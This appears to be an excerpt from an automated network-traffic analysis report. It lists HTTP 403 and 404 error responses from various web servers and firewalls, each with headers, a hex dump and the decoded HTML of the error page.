                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:56 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:55:56 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:55:56 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: MsUq6xAn/qZjA0jDpData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:55:56 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:56 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:55:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:57 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Mar 2023 06:55:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 3X-Kong-Proxy-Latency: 0Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:58 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Fri, 10 Mar 2023 06:56:13 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jo3q1XwdfFQ7xQYxhSXEdmCIhvdJzuxkxDetxtDOuXYXlhHJ0iqPqmo1T09LWufS3U%2FqBLDean6vri%2BOApT6CmHC%2FOfexhYqkl0Fy%2BXpnjzDY38XRyQUSYuIhosdkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7b96a5f3662-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:55:59 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: aTl43wx9/Lu2NHFzZData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:59 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:20:42 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:59 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/HUoyaRa/JQTunAMiSjnYQ2,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1678431359.277130032456716916X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
